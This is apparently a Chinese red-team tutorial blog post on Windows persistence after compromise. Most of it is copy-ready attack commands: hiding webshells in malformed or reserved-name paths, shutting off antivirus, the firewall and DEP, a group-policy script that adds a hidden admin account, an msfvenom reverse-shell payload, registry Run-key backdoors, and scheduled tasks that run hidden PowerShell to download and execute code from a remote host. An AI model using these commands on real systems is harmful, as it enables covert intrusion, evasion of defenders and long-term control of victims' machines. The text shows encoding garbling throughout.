小白白红队初成长（5）win权限维持

1、前言

1.0、闲谈

这一章节之前&＃xff0c;建议大家学会写poc&＃xff0c;利用poc批量拿洞等等。


接着说说国家级虎王的情况。


国家级虎王&＃xff0c;红队攻击时间一般为30天&＃xff0c;目标一般总计会有60个目标。第一批一般给30个目标&＃xff0c;之后每一周可以将一些未拿下的目标与其他队伍切换。一队为3个人&＃xff08;一线&＃xff09;&＃xff0c;20年的标准&＃xff0c;提供每个人提供3个机器&＃xff0c;每个机器3个IP&＃xff08;一般非一个&＃xff23;段&＃xff09;&＃xff0c;原则上不允许使用除了这9个之外的IP进行攻击。

先捏软柿子&＃xff0c;一般目标安全等级&＃xff08;互联网>>金融>>政企、运营商&＃xff09;当然有意外的情况&＃xff0c;一些敏感的政企在互联网上基本没有暴露面&＃xff08;如XX导弹中心&＃xff09;&＃xff0c;这些服务一般全在内网&＃xff0c;大家的目标之中假设有这些目标直接放弃就好了&＃xff0c;当然APT的话另说&＃xff0c;毕竟APT有着大量的时间去研究&＃xff0c;而正常的虎王是很注重效率一说。


1.1、攻击思路

在整个过程之中&＃xff0c;思路是最重要的;即使是国际级的红队人员也是有很多知识是不懂现学的。

建议在攻击的时候&＃xff0c;画一个思维导图&＃xff0c;这样就可以很清晰的每一步自己在干什么&＃xff0c;下步要干什么。

信息收集&＃xff08;一线与二线都会贯穿整个周期&＃xff09;&＃xff0c;假设二线的人员发现一个突破点也会交给一线。然后二线继续做信息收集找更多的突破点。突破点多数在DMZ区域。


DMZ&＃xff08;外网&＃xff09;机器一定会做权限维持&＃xff0c;之后的思路就是跨段&＃xff0c;不要在DMZ区域晃了&＃xff08;哪怕很容易就能拿下第二台DMZ区域的机器&＃xff09;&＃xff0c;优先找可以跨段的机器&＃xff08;OA、SSO、运维&＃xff09;。


• 如何寻找可以跨段的机器&＃xff1f;

  通过经验判断 oa这种大概率都是跨区域的&＃xff1b;堡垒机一般都是跨段的&＃xff0c;如何寻找堡垒机&＃xff1f;多个终端连接的大概率堡垒机&＃xff08;拿下的多台机器通过netstart查看网络连接&＃xff0c;比如都与A这台机器有链接&＃xff0c;那么A机器就大概率是堡垒机&＃xff09;。拿下堡垒机的思路&＃xff1a;~历史漏洞~已经拿下机器浏览器中有概率保存密码


拿下DMZ区域可以跨段的机器之后&＃xff0c;开始内网穿透进入内网&＃xff0c;在内网可以进行小范围横向&＃xff0c;然后继续横向跨段、横向跨段拿下办公网的机器或核心网机器。


• 横向用到的一些SMB扫描工具如fscan&＃xff0c;

• 提权一般都是直接使用CS自带/增加的一些提取模块&＃xff0c;

• 域渗透常用手段&＃xff1a;

  PTH、黄金票据、一些漏洞如cve-2020-1472&＃xff08;置空域管理员的一个洞&＃xff09;。


1.2、得分情况

常规&＃xff0c;

一个webshell、一个数据库、主机权限都是50分主机最高权限100分&＃xff0c;数据库资料较多的话可以翻倍。


跨段&＃xff0c;

但是跨段&＃xff0c;比如从DMZ到内网区域可以给1000分。DMZ与内网段一般存在隔离的情况&＃xff08;逻辑隔离与硬件隔离&＃xff09;&＃xff0c;比如突破一个隔离的网段&＃xff0c;一般可以拿3000~5000分。


靶标&＃xff0c;

除此之外&＃xff0c;一般的攻防演练也存在靶标&＃xff08;一般2~3个&＃xff09;的情况&＃xff0c;一般一个靶标1W分。所以在攻防演练的时候&＃xff0c;一般很少去可以提权&＃xff0c;意义不大&＃xff0c;重点是跨段与靶标。在之前的演练之中&＃xff0c;某一个队伍拿到靶标之后&＃xff0c;这个厂商就出局了&＃xff0c;即别的队伍在拿到靶标也没用了&＃xff0c;当然今年&＃xff08;21&＃xff09;靶标一直存在。


1.3、在哪里做权限维持

在红队行动中在网络中获得最初的立足点是一项耗时的任务。因此&＃xff0c;持久性是红队成功运作的关键&＃xff0c;这将使团队能够专注于目标&＃xff0c;而不会失去与指挥和控制服务器的通信。


小结三种情况&＃xff0c;

• DMZ的打点机器、

• 关键机器&＃xff08;可以跨段的机器&＃xff09;

• 存在大量数据的机器

  &＃xff08;如存在很多浏览器记录、通讯录等等可以对后续打点、横向有帮助的机器&＃xff09;

2、windows权限维持

简述&＃xff1a;后门&＃xff08;webshell、粘贴键、放大镜、主策略等等&＃xff09;&＃43; 隐藏

权限维持的前提是已经获得机器的权限&＃xff08;可以不是最高权限&＃xff0c;具体看需求&＃xff09;

在横向的时候&＃xff0c;一些工具往往需要大家进行二开来躲避杀软/流量分析。比如fscan&＃xff0c;对于这种工具&＃xff0c;一般来说只要修改流量上的特征即可&＃xff0c;加一些乱码或者其他的绕过特征检测即可。


2.0、以下姿势不仅asp可以使用&＃xff0c;php与jsp也可以使用。

2.1、“真正”隐藏文件

命令如&＃xff1a; attrib &＃43;s &＃43;a &＃43;h &＃43;r c:\test

想要取消的话&＃xff0c;直接命令行执行“ attrib -s -a -h -r c:\test ”即可&＃xff0c;


使用Attrib &＃43;s &＃43;a &＃43;h &＃43;r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。新建文件夹T&＃xff0c;T内新建A与B文件夹&＃xff0c;我们使用命令行把A文件夹隐藏&＃xff0c;A文件夹内含有a.txt &＃xff1b;B文件夹含有b.txt文件。这样就做到了真正的隐藏&＃xff0c;不管你是否显示隐藏文件&＃xff0c;此文件夹都看不见&＃xff0c;

但是仍然可以通过命令行进入&＃xff0c;


值得说的是&＃xff0c;通过此方式隐藏的文件&＃xff0c;使用命令行“ dir ”也无法看到a文件夹&＃xff0c;

2.2、系统文件夹图标

给B文件夹重新命名为&＃xff1a;“我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D}”

这样的话&＃xff0c;不使用命令行是比较难发现的&＃xff0c;且这个不仅仅是替换了图标&＃xff0c;双击b文件夹&＃xff0c;效果与真正的“我的电脑”是一致的&＃xff0c;


想要看到b文件夹内的真正文件&＃xff0c;那就使用命令行把。


这里想要恢复的话&＃xff0c;建议还是使用命令行改&＃xff08;直接修改文件夹是无法去掉“ .{20D04FE0-3AEA-1069-A2D8-08002B30309D} ”的&＃xff09;。使用命令行“ rename "我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D}" b ”这个“ 我的电脑xxx ”名字太长的话&＃xff0c;可以使用tab键补齐&＃xff0c;正常恢复&＃xff0c;


除了命令行&＃xff0c;我们也可以用WinRAR找到这个文件夹&＃xff0c;然后重命名文件夹把后缀的“.{20D04FE0-3AEA-1069-A2D8-08002B30309D}”删除。然后我们再回到文件夹的存放地方&＃xff0c;会发现已经变回原来的普通文件夹了。


附带一些常用文件代号&＃xff1a;

我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D}回收站.{645ff040-5081-101b-9f08-00aa002f954e}拔号网络.{992CFFA0-F557-101A-88EC-00DD010CCC48}打印机.{2227a280-3aea-1069-a2de-08002b30309d}控制面板.{21ec2020-3aea-1069-a2dd-08002b30309d}网上邻居.{208D2C60-3AEA-1069-A2D7-08002B30309D}

2.3、畸形目录

原理是&＃xff1a;

只需要在目录名后面加两个点&＃xff08;也可以为多个点&＃xff09;就行了&＃xff0c;用户图形界面无法访问。


在T文件夹新建” c.txt ”内容随意&＃xff0c;使用命令行“ md c..\ ”创建“ C.. ”文件夹&＃xff0c;这个最后的“\”是不能少的&＃xff0c;创建之后图形化无法查看、删除该文件夹。

该文件夹&＃xff0c;杀软也是无法粉碎的&＃xff0c;

然后将创建“ c.txt ”文件复制进去&＃xff0c;

使用URL访问&＃xff1a;/c…/c.asp &＃xff08;两个点&＃xff09;

删除目录&＃xff1a; rd /s /q c…\

2.4、系统保留文件名

利用系统保留文件名创建无法删除的webshell&＃xff0c;Windows 下不能够以下面这些字样来命名文件/文件夹&＃xff0c;包括&＃xff1a;aux&＃xff0c;com1&＃xff0c;com2&＃xff0c;prn&＃xff0c;con和nul等&＃xff0c;但是通过cmd下是可以创建此类文件夹的&＃xff0c;使用copy命令即可实现&＃xff1a;


使用命令“ copt c.txt \\.\C:\Users\xx\Desktop\T\com1.asp ”

就可以创建名称为“ com1.asp ”的文件名称&＃xff0c;

该文件无法通过图形化正常打开&＃xff0c;删除。但是在IIS中又是可以成功解析的。

正常可以这么读取 “ type \.\C:\Users\xx\Desktop\T\com1.asp”

删除的话&＃xff0c;命令“ del \\.\C:\Users\xx\Desktop\T\com1.asp ”&＃xff0c;

读取与删除不加“ \.\ ”是无法读取的。

2.5、组合使用

以上集中情况可以组合使用&＃xff0c;

先整一个“ 系统文件夹图标 ”下创建一个畸形目录&＃xff0c;畸形目录下整一个无法删除的文件名。

这一套下来&＃xff0c;普通的防守方是很难搞定的。

2.6、驱动级文件隐藏

驱动隐藏最典型的现象就是系统盘中存在以下文件&＃xff1a;

c:\WINDOWS\xlkfs.datc:\WINDOWS\xlkfs.dllc:\WINDOWS\xlkfs.inic:\WINDOWS\system32\drivers\xlkfs.sys


驱动隐藏我们可以用过一些软件来实现&＃xff0c;软件名字叫&＃xff1a;Easy File Locker

下载链接&＃xff1a; http://www.xoslab.com/efl.html

一般做黑连的小朋友都会这样设置&＃xff1a;只勾选可读&＃xff0c;其他的一律拒绝。那么&＃xff0c;会有这样的效果&＃xff0c;该文件不会显示&＃xff0c;不能通过列目录列出来&＃xff0c;也不能删除&＃xff0c;除非你知道完整路径&＃xff0c;你才可以读取文件内容。并且该软件还可以设置密码&＃xff0c;启动、修改设置、卸载及重复安装的时候都需要密码&＃xff0c;更蛋疼的是&＃xff0c;主界面、卸载程序等都可以删除&＃xff0c;只留下核心的驱动文件就行了。


如何清除&＃xff08;下边是cmd命令&＃xff09;

1、查询服务状态&＃xff1a; sc qc xlkfs2、停止服务&＃xff1a; net stop xlkfs 服务停止以后&＃xff0c;经驱动级隐藏的文件即可显现3、删除服务&＃xff1a; sc delete xlkfs4、删除系统目录下面的文件&＃xff0c;重启系统&＃xff0c;确认服务已经被清理了。


3、关闭杀软

拿到目标主机的shell后第一件事就是关闭掉目标主机的杀毒软件&＃xff0c;可以通过MSF命令” run killav ”&＃xff0c;当然很多情况下&＃xff0c;此操作无法关闭到杀软。我们使用使用一些开源的程序帮忙&＃xff0c;如&＃xff1a; https://github.com/Yaxser/Backstab 使用该软件干掉杀软之后要注意&＃xff0c;defend存在一个自我保护机制&＃xff08;即使已经被干掉&＃xff09;&＃xff0c;假设当前机器没有杀软的情况下&＃xff0c;隔几分钟自己就起来了。所以做一些危险操作的时候&＃xff0c;干掉当前设备的所以杀软之后要计算好时间。


还有一些常用CMD命令&＃xff08;需要admin及其以上的权限&＃xff09;&＃xff1a;

关闭防火墙命令&＃xff1a;


netsh advfirewall set allprofiles state off

命令关闭Denfnder&＃xff1a;


Net stop windefend

命令关闭/打开DEP&＃xff08;数据执行保护&＃xff09;&＃xff1a;


bcdedit.exe /set {current} nx Alwaysoff
bcdedit/set {current} nx AlwaysOn

参考连接&＃xff1a; http://t.zoukankan.com/liqik-p-13046760.html

其他的补充&＃xff1a;

命令关闭杀毒软件&＃xff1a; 在meterpreter下执行run post/windows/manage/killavnet stop sharedaccess ----关系统自带防火墙c:\pskill.exe ravmon ntsd –c -q -p PID ----杀掉瑞星软件c:\pskill.exe pfw ----关天网防火墙net stop "Symantec AntiVirus" ----关诺顿企业版net stop KAVStart c:\pskill kavstart / KWatch ----关闭金山杀毒net stop fmdaemon c:\pskill.exe syncserver 关闭webguard主页防修改软件的方法把时间调到2038之后.卡巴出现错误.自动关闭将时间调到2099年&＃xff0c;发现blackice服务停止关于诺顿企业版“文件自动防护“的关闭&＃xff1a;1&＃xff09;关闭服务&＃xff1a;net stop "Symantec AntiVirus"2)关闭进程&＃xff1a;Rtvscan&＃xff0c;CCAPP&＃xff0c;vptray&＃xff0c;defwatch

4、组策略

相对来说&＃xff0c;组策略后门更加隐蔽。往册表中添加相应键值实现随系统启动而运行是木马常用的伎俩&＃xff0c;也为大家所熟知。其实&＃xff0c;在组策略中也可以实现该功能&＃xff0c;不仅如此它还可以实现在系统关机时进行某些操作。这就是通过最策略的“脚本(启动/关机)”项来说实现。具体位置在 “计算机配置→Windows设置” 项下。因为其极具隐蔽性&＃xff0c;因此常常被攻击者利用来做服务器后门。 　


攻击者获得了服务器的控制权就可以通过这个后门实施对对主机的长期控制。它可以通过这个后门运行某些程序或者脚本&＃xff0c;最简单的比如创建一个管理员用户&＃xff0c;他可以这样做&＃xff1a;新建一个文件“ a.bat ”将下边的内容复制到文件中&＃xff0c;echo off net user hack$ test168 /add net localgroup administrators hack$ /add exit在“运行”对话框中输入gpedit.msc&＃xff0c;定位到“计算机配置一>Windows设置一>脚本(启动/关机)”,双击右边窗口的“关机”&＃xff0c;在其中添加add.bat。

当系统关机时创建hack$用户。对于一般的用户是根本不知道在系统中有一个隐藏用户&＃xff0c;就是他看见并且删除了该帐户&＃xff0c;当系统关机时又会创建该帐户。所以说&＃xff0c;如果用户不知道组策略中的这个地方那他一定会感到莫名其妙。其实&＃xff0c;对于组策略中的这个“后门”还有很多利用法&＃xff0c;攻击者通过它来运行脚本或者程序&＃xff0c;嗅探管理员密码等等。当他们获取了管理员的密码后&＃xff0c;就不用在系统中创建帐户了&＃xff0c;直接利用管理员帐户远程登录系统。因此它也是“双刃剑”&＃xff0c;希望大家重视这个地方。当你为服务器被攻击而莫名其妙时&＃xff0c;说不定攻击者就是通过它实现的。当然缺点也很明显&＃xff0c;就是这个目录一般都会被杀毒工具、或者蓝队进行针对性的排查。


参考连接&＃xff1a;https://buaq.net/go-27418.html

5、注册表&＃xff08;重要&＃xff09;&＃xff08;注意面纱&＃xff09;

简单的说&＃xff0c;通过修改注册表的值达到注册表的后门。

其目的和组策略一致&＃xff0c;即用户登录系统的时候自动执行攻击者的后门如&＃xff08;msf的木马&＃xff09;。

区别是组策略是按照用户组划分 注册表是事件触发的。

使用命令生成MSF木马&＃xff1a;msfvenom -p windows/meterpreter/reverse_tcp LHOST&＃61;192.168.1.108 LPORT&＃61;6666 -f exe -o pentestlab.exeMSF开启监听&＃xff0c;


复制木马到吧唧C盘用户目录下&＃xff0c;在八级执行下边命令&＃xff08;4条中得随机一条即可&＃xff09;&＃xff1a;

该注册表操作语句会在目标主机的启动项里增加一个命名。

当目标主机登录系统时&＃xff0c;后门就会运行。这里注意得是

• 锁屏登陆 不属于登陆。

• 假设4条都执行了&＃xff0c;正常来说会返回4条会话。

• 部分电脑没有后两个的注册表键值&＃xff0c;建议实战选择前两个。

  &＃xff08;要选择有的键值&＃xff0c;不同windows版本键值不是完全一样的&＃xff09;

• 以这种方式得后门&＃xff0c;重启机器后无论哪个是哪个用户登录了系统&＃xff0c;传回msf的权限都是设置上述注册列表的用户权限。


reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"

下边的4条命令需要管理员权限才可以添加&＃xff0c;

与上边不同的是&＃xff0c;上边的几条语句是添加在当前的用户下&＃xff0c;几乎任何人都可以看到&＃xff0c;

下边的只有管理员权限才可以操作&＃xff0c;是添加到系统层面&＃xff0c;非管理员权限是无法查看的。

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"

• Meterpreter –Run键

另外还存在两个注册表位置&＃xff0c;这些位置可以放置一些DLL文件或者exe来实现持久性。在用户登录系统的时候被执行&＃xff0c;注意的是下边两条命令需要管理员权限&＃xff0c;还有计算机不一定存在这两个注册表。


• 其他

当已经存在一个MSF会话的时候&＃xff0c;我们可以直接执行语句&＃xff1a;run persistence -U -P windows/meterpreter/reverse_tcp -i 5 -p 6669 -r 192.168.1.108会生成一个VBS的脚本&＃xff0c;然后自动上传到目标机器上&＃xff0c;最后创建一个注册列表当用户登录的时候自动运行该后门。&＃xff08;注意要开启一个新的对应监听&＃xff09;

6、计划任务

• 计划任务操作需要管理员以上的权限。

• 计划任务中最主要的是不要写错“ 时间点 ”与“ 触发条件 ”&＃xff0c;

一般来说&＃xff0c;计划任务不被发现的两个点&＃xff1a;

~触发条件~隐藏的稍微深一点


计划任务也可以通过图形化界面创建&＃xff0c;计划任务默认是放到比较靠前的&＃xff0c;

实战图像化的话&＃xff0c;可以放在子集目录&＃xff0c;

• 比较常用的几个计划任务&＃xff1a;

#(X64) - On System Start system用户登录的时候触发
schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &＃39;IEX ((new-object net.webclient).downloadstring(&＃39;&＃39;http://10.0.2.21:8080/ZPWLywg&＃39;&＃39;&＃39;))&＃39;" /sc onstart /ru System#(X64) - On User Idle (30mins) 每30分钟触发
schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &＃39;IEX ((new-object net.webclient).downloadstring(&＃39;&＃39;http://10.0.2.21:8080/ZPWLywg&＃39;&＃39;&＃39;))&＃39;" /sc onidle /i 30#(X86) - On User Login 用户登录的时候触发
schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &＃39;IEX ((new-object net.webclient).downloadstring(&＃39;&＃39;http://10.0.2.21:8080/ZPWLywg&＃39;&＃39;&＃39;))&＃39;" /sc onlogon /ru System#(X86) - On System Start 当system启用的时候触发
schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &＃39;IEX ((new-object net.webclient).downloadstring(&＃39;&＃39;http://10.0.2.21:8080/ZPWLywg&＃39;&＃39;&＃39;))&＃39;" /sc onstart /ru System#(X86) - On User Idle (30mins) 每30分钟触发一次
schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &＃39;IEX ((new-object net.webclient).downloadstring(&＃39;&＃39;http://10.0.2.21:8080/ZPWLywg&＃39;&＃39;&＃39;))&＃39;" /sc onidle /i 30

补充

这个c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe是要执行程序的绝对路径&＃xff0c;实战中可以直接换位面纱吗。后边的是参数&＃xff0c;这个是可选条件:-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &＃39;IEX ((new-object net.webclient).downloadstring(&＃39;&＃39;http://10.0.2.21:8080/ZPWLywg&＃39;&＃39;&＃39;))&＃39;


7、内存马

Java为主&＃xff0c;实战当中都是提前准备好&＃xff0c;不会现场写。

日后在补充。